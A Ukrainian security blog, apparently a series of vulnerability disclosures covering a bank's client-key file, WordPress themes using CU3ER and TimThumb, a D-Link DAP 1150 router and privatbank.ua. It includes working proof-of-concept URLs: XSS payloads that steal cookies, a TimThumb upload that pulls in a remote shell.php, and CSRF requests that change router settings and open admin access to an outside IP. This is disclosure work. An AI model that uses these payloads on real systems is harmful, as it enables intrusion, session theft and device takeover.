Websecurity - Веб безпека

У січні, 06.01.2012, я знайшов Information Leakage уразливості в БНК Клієнт-банк - це система інтернет-банкінгу від АКБ “Національний кредит”. Про що найближчим часом повідомлю розробникам системи.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на privatbank.ua.

Information Leakage (WASC-13):

При генерації секретного ключа мають місце наступні уразливості:

По замовчуванню створюється файл з іменем ПІБ користувача та розширенням key. Що полегшує пошук ключа при доступі до комп’ютера користувача чи носія даних, де він зберігається.

Прізвище_Ім’я_Побатькові.key

1. Розширення .key (типово для ключів систем клієнт-банк). Можна змінити.
2. В імені файлу ключа вказано ПІБ. Можна змінити.
3. В тексті файлу ключа вказано ПІБ. Не можна змінити.

Це гірше ніж в системах клієнт-банка Аваля та інших систем на основі Ibank від БИФИТ та систем інших банків, з якими мені доводилося стикатися.

В даній добірці уразливості в веб додатках:

• Hard-coded accounts on multiple network cameras (деталі)
• Secure Entry Server - URL Redirection (деталі)
• Jenkins v1.523 Default markup formatter permits offsite-bound forms (деталі)
• Plain Text Password In SonarQube Jenkins Plugin (деталі)
• Vulnerability in Squid (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Spider Video Player, TDO-Mini-Forms та Husker-Portfolio. Для котрих з’явилися експлоіти. Spider Video Player - це відео плеєр, TDO-Mini-Forms - це плагін для створення форм, Husker-Portfolio - це плагін для створення портфоліо.

• WordPress Spider Video Player 2.1 Cross Site Scripting (деталі)
• WordPress TDO-Mini-Forms Shell Upload (деталі)
• WordPress Husker-Portfolio Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У квітні, 23.04.2014, я виявив Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Flexolio для WordPress. Вона містить CU3ER і TimThumb.

Content Spoofing (WASC-12):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

1.xml:

cu3er-1.xml

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://

А також Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок. Вони можливі в старих версіях теми, бо в останніх версіях теми в TimThumb заборонений доступ до зовнішніх сайтів.

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php

Full path disclosure (WASC-13):

FPD в php-файлах шаблону (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/flexolio/

Уразливі всі версії теми Flexolio.

В даній добірці уразливості в веб додатках:

• Linksys X3000 - Multiple Vulnerabilities (деталі)
• Cisco/Linksys E1200 N300 Reflected XSS (деталі)
• CVE-2013-3568 - Linksys CSRF + Root Command Injection (деталі)
• LiveZilla 5.1.2.0 Multiple Stored XSS in webbased operator client (деталі)
• Leed (Light Feed) - Multiple vulnerabilities (деталі)

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Advanced / Device mode через CSRF можна змінювати режим роботи пристрою. Якщо увімкнений режим точки доступу, то для атаки на уразливості в режимі роутера потрібно увімкнути цей режим.

Увімкнути режим точки доступу:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0

Увімкнути режим роутера:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0

CSRF (WASC-09):

В розділі Advanced / Remote access через CSRF можна можна додавати, редагувати та видаляти налаштування віддаленого доступу до веб інтерфейсу. Наступний запит дозволить віддалений доступ в адмінку з IP 50.50.50.50.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Advanced / Remote access.

Атака через функцію додавання в параметрі res_buf (в полях: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf (в полях: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

У червні, 23.06.2013, я знайшов нові Cross-Site Scripting та Insufficient Anti-automation уразливості на http://privatbank.ua. За 3 XSS уразливості ПриватБанк мені заплатив (тому про них я деталей не наведу), але досі повністю не виправив. Адміни додали фільтри, але їх потенційно можна обійти - ось тому потрібно якісно виправляти уразливості. А от IAA дірку виправляти не стали.

Стосовно ПриватБанка я вже писав про численні уразливості на www.blog.privatbank.ua та уразливості в LiqPAY для Android та iOS.

Всі уразливості наявні в формі http://privatbank.ua/cpa/credit-card/. Ось інформація про IAA, яку ПриватБанк не захотів виправляти, мотивуючи це тим, що в них капча розробляється, тому всі ці та інші IAA (що я знайшов на privatbank.ua та інших сайтах, а таких дірок я знайшов багато) вони “вважають виправленими”, мовляв капчу зроблять і поставлять на своїх сайтах. При тому, що в деяких формах вже є капча, але вони мовляв роблять нову. Це така відмазка, аби не виправляти дірки на своїх сайтах і не проводити оплату цих дірок.

Insufficient Anti-automation:

В формі http://privatbank.ua/cpa/credit-card/ немає захисту від автоматизованих атак (капчі).

Дана уразливість, як і багато подібних дірок, досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах OptimizePress, FormCraft та PhotoSmash Galleries. Для котрих з’явилися експлоіти. OptimizePress - це тема движка, FormCraft - це плагін для створення форм, PhotoSmash Galleries - це плагін для створення галерей зображень.

• WordPress OptimizePress Theme File Upload (деталі)
• WordPress FormCraft Premium SQL Injection (деталі)
• WordPress Photosmash Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Juniper Secure Access XSS Vulnerability (деталі)
• SAMSPADE 1.14 BUFFER OVERFLOW (деталі)
• LiveZilla 5.1.2.0 Insecure password storage (деталі)
• LiveZilla 5.1.2.0 PHP Object Injection (деталі)
• HP Service Manager and HP ServiceCenter, Cross Site Scripting (XSS) and Disclosure of Information (деталі)

Раніше я писав про уразливості в CU3ER. У квітні, 19.04.2014, я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних темах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Окрім плагінів, про які я писав, флешка CU3ER також міститься в наступних шаблонах для WordPress: ShapeShifter, Los Angeles, Themebox, Elite Force, Webfolio та інших темах, в тому числі платних і кастом темах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/1.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/1.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/1.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/xss.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/xss.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/xss.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах шаблонів (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/shapeshifter/
http://site/wp-content/themes/shapeshifter2/
http://site/wp-content/themes/los_angeles/
http://site/wp-content/themes/themebox/
http://site/wp-content/themes/themebox10/
http://site/wp-content/themes/themebox11/
http://site/wp-content/themes/elite_force/
http://site/wp-content/themes/webfolio/

Уразливі всі шаблони з флешкою CU3ER: ShapeShifter 1.x і 2.x, Los Angeles, Themebox 1.1, Elite Force 2.1.0, Webfolio 2.0.2 та попередні версії цих тем.